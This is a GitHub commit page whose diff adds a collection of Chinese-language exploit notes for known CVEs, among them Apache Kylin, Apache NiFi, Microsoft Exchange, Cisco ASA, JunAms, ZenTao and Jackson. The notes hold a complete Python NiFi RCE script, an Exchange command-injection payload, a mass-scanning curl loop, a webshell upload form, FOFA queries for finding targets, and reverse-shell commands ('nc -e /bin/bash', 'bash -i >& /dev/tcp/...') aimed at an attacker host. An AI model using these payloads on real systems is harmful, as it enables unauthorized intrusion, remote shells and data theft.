Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
@r0eXpeR
r0eXpeR authored Jan 15, 2021
1 parent 0dcea3b commit 4633feb
Show file tree
Hide file tree
Showing 65 changed files with 4,126 additions and 2 deletions.
14 changes: 14 additions & 0 deletions Apache Kylin API未授权访问漏洞(CVE-2020-13937).md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
# Apache Kylin API未授权访问漏洞(CVE-2020-13937)


fofa:title="Kylin"

预警通告:https://help.aliyun.com/noticelist/articleid/1060733129.html

PoC:

```
http://xx.com/kylin/api/admin/config
```

![](media/16097311107960/16097311518750.jpg)
124 changes: 124 additions & 0 deletions Apache NiFi Api 远程代码执行(RCE).md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,124 @@
# Apache NiFi Api 远程代码执行(RCE)

**FOFA:**

"nifi" && title=="NiFi"

![](media/16096813383313/16096813558152.jpg)


exp.py:


```python
import sys
import json
import requests as req


class Exp:
def __init__(self, url):
self.url = url

def check_is_vul(self):
url = self.url + "/nifi-api/access/config"
try:
res = req.get(url=url, verify=False)
data = res.json()
return not data["config"]["supportsLogin"]
except Exception as e:
pass
return False

def clean_up(self, p_id):
url = self.url + "/nifi-api/processors/" + p_id + "/run-status"
data = {'revision': {'clientId': 'x', 'version': 1}, 'state': 'STOPPED'}
req.put(url=url, data=json.dumps(data), verify=False)
req.delete(url + "/threads", verify=False)

def exploit(self, cmd):
g_id = self.fetch_process_group()
if g_id:
p_id = self.create_process(g_id)
if p_id:
self.run_cmd(p_id=p_id, cmd=cmd)
self.clean_up(p_id=p_id)

def run_cmd(self, p_id, cmd):
url = self.url + "/nifi-api/processors/" + p_id
cmd = cmd.split(" ")
data = {
'component': {
'config': {
'autoTerminatedRelationships': ['success'],
'properties': {
'Command': cmd[0],
'Command Arguments': " ".join(cmd[1:]),
},
'schedulingPeriod': '3600 sec'
},
'id': p_id,
'state': 'RUNNING'
},
'revision': {'clientId': 'x', 'version': 1}
}
print(data)
headers = {
"Content-Type": "application/json",
}
res = req.put(url=url, data=json.dumps(data), headers=headers, verify=False)
return res.json()

def fetch_process_group(self):
url = self.url + "/nifi-api/process-groups/root"
try:
res = req.get(url=url, verify=False)
data = res.json()["id"]
return data
except Exception as e:
pass
return 0

def create_process(self, process_group_id):
url = self.url + "/nifi-api/process-groups/" + process_group_id + "/processors"
data = {
'component': {
'type': 'org.apache.nifi.processors.standard.ExecuteProcess'
},
'revision': {
'version': 0
}
}
headers = {
"Content-Type": "application/json",
}
try:
res = req.post(url=url, data=json.dumps(data), headers=headers, verify=False)
return res.json()["id"]
except Exception as e:
pass
return 0


if __name__ == '__main__':
if len(sys.argv) != 3:
print("rce.py url cmd")
else:
url = sys.argv[1] # http://192.168.1.1:8080
cmd = sys.argv[2] # nc -e /bin/bash 192.168.1.129 1234
e = Exp(url)
e.exploit(cmd)

```

msf模块:

https://packetstormsecurity.com/files/160260/apache_nifi_processor_rce.rb.txt

ref:

https://twitter.com/chybeta/status/1333341820596568065

https://github.com/imjdl/Apache-NiFi-Api-RCE

https://forum.ywhack.com/thread-114763-1-3.html
83 changes: 83 additions & 0 deletions Bypass for Microsoft Exchange远程代码执行 CVE-2020-16875.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,83 @@
# Bypass for Microsoft Exchange远程代码执行 CVE-2020-16875

CVE-2020-16875的补丁代码:


```
internal static void ValidateCmdletParameters(string cmdlet,
IEnumerable<KeyValuePair<string, string>> requiredParameters)
{
if (string.IsNullOrWhiteSpace(cmdlet))
{
return;
}
Collection<PSParseError> collection2;
Collection<PSToken> collection = PSParser.Tokenize(cmdlet,
out collection2);
if (collection2 != null && collection2.Count > 0)
{
throw new DlpPolicyParsingException(
Strings.DlpPolicyNotSupportedCmdlet(cmdlet));
}
if (collection != null)
{
// #1 CHECKS IF THERE IS MORE THAN ONE COMMAND, BUT DOES NOT
// RECOGNIZE .NET FUNCTIONS SUCH AS [Int32]::Parse("12")
if ((from token in collection
where token.Type == PSTokenType.Command
select token).ToList<PSToken>().Count > 1)
{
throw new DlpPolicyParsingException(
Strings.DlpPolicyMultipleCommandsNotSupported(cmdlet));
}
}
bool flag = false;
foreach (KeyValuePair<string, string> keyValuePair in requiredParameters)
{
// #2 CHECKS IF THE cmdlet STRING(!!) STARTS WITH AN ALLOWED KEY
if (cmdlet.StartsWith(keyValuePair.Key,
StringComparison.InvariantCultureIgnoreCase))
{
// #3 CHECKS IF THE THE VALUES / PARAMETERS MATCH A CERTAIN
// REGEX
if (!Regex.IsMatch(cmdlet, keyValuePair.Value,
RegexOptions.IgnoreCase))
{
throw new DlpPolicyParsingException(
Strings.DlpPolicyMissingRequiredParameter(cmdlet,
keyValuePair.Value));
}
flag = true;
}
}
if (!flag)
{
throw new DlpPolicyParsingException(Strings.DlpPolicyNotSupportedCmdlet(
cmdlet));
}
}
```

**绕过:**

可以轻松绕过检查#2,因为检查是在原始cmdlet字符串,仅使用函数.StartsWith()检查cmdlet的开头。要绕过,我们只提供给定的有效键中包含的命令字符串通过requiredParameters:

```
new-transportruleSOMETHINGELSE ....
```

**PoC:**

以下Payload可以绕过所有三个检查:


```
<![CDATA[ new-transportrule
-Name $([Diagnostics.Process]::start("cmd.exe / C <run-as-SYSTEM>"))
-DlpPolicy "%%DlpPolicyName%%"
]]>
```

详情可以阅读:https://x41-dsec.de/security/advisory/exploit/research/2020/12/21/x41-microsoft-exchange-rce-dlp-bypass/

https://forum.ywhack.com/thread-114854-1-2.html
42 changes: 42 additions & 0 deletions CISCO ASA任意文件读取漏洞 (CVE-2020-3452).md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
# CISCO ASA任意文件读取漏洞 (CVE-2020-3452)


POC:


```
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```


```
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: webvpnlogin=1; webvpnLang=en
```

```
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Content-Length: 2
```

从列表中单行检查CVE-2020-3452


```bash
while read DOM; do curl -s -k "https://$DOM/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q Cisco && echo [VULNERABLE] $DOM || echo [NOT VULNERABLE] $DOM; done < $1

```

ref:

https://forum.ywhack.com/thread-1419-1-7.html
26 changes: 26 additions & 0 deletions CNVD-2020-24741 JunAms内容管理系统文件上传漏洞.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
# CNVD-2020-24741 JunAms内容管理系统文件上传漏洞


JunAMS是一款以ThinkPHP为框架的开源内容管理系统。

JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。

影响版本:JunAMS junAMS 1.2.1.20190403

EXPLOIT:


```html
<form enctype="multipart/form-data" action="http://localhost//admin.php/common/add_images.html" method="post">
<input type="file" name="file" size="50"><br>
<input type="submit" value="Upload">
</form>

```

via:beautymanor

ref:

https://www.cnvd.org.cn/flaw/show/CNVD-2020-24741

35 changes: 35 additions & 0 deletions CNVD-C-2020-121325 禅道开源版文件上传漏洞.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
# CNVD-C-2020-121325 禅道开源版文件上传漏洞


禅道官网发布了12.4.3版本更新公告,修复了一个文件上传的漏洞。恶意攻击者(需要登陆后台的任意⽤用户)可以通过fopen/fread/fwrite方法结合file、http、ftp等协议,读取或上传任意敏感文件,成功利用漏洞可获得目标系统中敏感文件及系统管理权限。

漏洞编号:

CNVD-C-2020-121325

漏洞等级:高危

受影响的版本:

禅道开源版<=12.4.2

通过版本比对,问题出在module/client/ext/model/xuanxuan.php:14 的 downloadZipPackage 函数中:

![](media/16097310393821/16097310621213.jpg)


没有对后缀名进行限制,补丁则进行了白名单处理

所以getshell 的一个方法之一就是直接远程download一个php文件即可shell。


![](media/16097310393821/16097310719167.jpg)


ref:

https://mp.weixin.qq.com/s/d-dtcUi2yLKsyXfPuyUF8A

https://www.zentao.net/dynamic/zentaopms12.4.3-80272.html

https://s.tencent.com/research/bsafe/1159.html
64 changes: 64 additions & 0 deletions CVE-2019-12384 jackson ssrf-rce(附exp脚本).md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,64 @@
# CVE-2019-12384 jackson ssrf-rce(附exp脚本)


1、ssrf:


```
POST /fuckme HTTP/1.1
Host: 192.168.136.131:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.136.129:7777/"}]
```

或者直接使用dnslog验证:


```
poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://jcqfpe.dnslog.cn/"}]
```

2、RCE:

首先在vps上放置一个.sql的文件,内容如下:


```sql
CREATE ALIAS SHELLEXEC AS $ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$;
CALL SHELLEXEC('bash -i >& /dev/tcp/192.168.136.129/7777 0>&1')
```

然后发送payload,请求远程的sql文件,进行RCE


```
POST /fuckme HTTP/1.1
Host: 192.168.136.131:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.136.129/exp.sql'"}]
```

via:Mosen
Loading

0 comments on commit 4633feb

Please sign in to comment.